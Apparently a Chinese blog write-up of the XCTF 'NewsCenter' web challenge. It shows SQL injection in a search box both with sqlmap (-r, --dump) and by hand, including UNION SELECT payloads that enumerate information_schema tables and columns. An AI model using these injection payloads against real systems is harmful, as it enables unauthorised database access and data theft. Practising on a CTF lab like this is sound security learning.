攻防世界web进阶区NewsCenter详解
2020-07-16 21:45
429 查看
攻防世界web进阶区NewsCenter详解
题目
我们输入搜索,很明显是一个注入
方法一sqlmap注入
抓到包之后,存到txt文件中,
-r获取文件
然后发现可以注入
接着我们–dump直接获取到flag(比较暴力)
方法二手工注入
前引号为了闭合之前的语句,后面的#为了注释后面的引号
否则都会报错
我们使用orderby 查询有几列
当我们写三时发现可以正常查询,4就不行了
发现有一些前缀的文章,那么我们使用一些垃圾话将他查询失效
2和三可以回显
database数据库为news
我们查询他的表
woaini' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema='news'#
我们查询他的列
woaini' union select 1,group_concat(column_name),database() from information_schema.columns where table_name='secret_table'#
我们查询fl4g字段
相关文章推荐
- 攻防世界 web进阶 NewsCenter
- XCTF攻防世界web进阶练习_ 1_NewsCenter
- 攻防世界web进阶区fakebook详解
- 攻防世界web进阶区shrine详解
- 攻防世界web进阶区Web_php_unserialize,序列化大详解
- 攻防世界web进阶区surpersqli详解
- 攻防世界web进阶PHP2详解
- 攻防世界web进阶区lottery详解
- 攻防世界web进阶区unserialize3详解
- 攻防世界web进阶区easytornado详解
- 攻防世界web进阶区Web_python_template_injection详解
- 攻防世界-web-高手进阶区 6-10题
- 攻防世界web进阶区PHP2
- 攻防世界 web 进阶 ics-07
- 攻防世界web进阶news center
- 攻防世界 web 进阶 i-got-id-200
- XCTF攻防世界web进阶练习_ 4_upload
- 攻防世界web进阶区ics-06
- 攻防世界WEB进阶——Cat wp
- XCTF攻防世界web进阶练习_ 2_lottery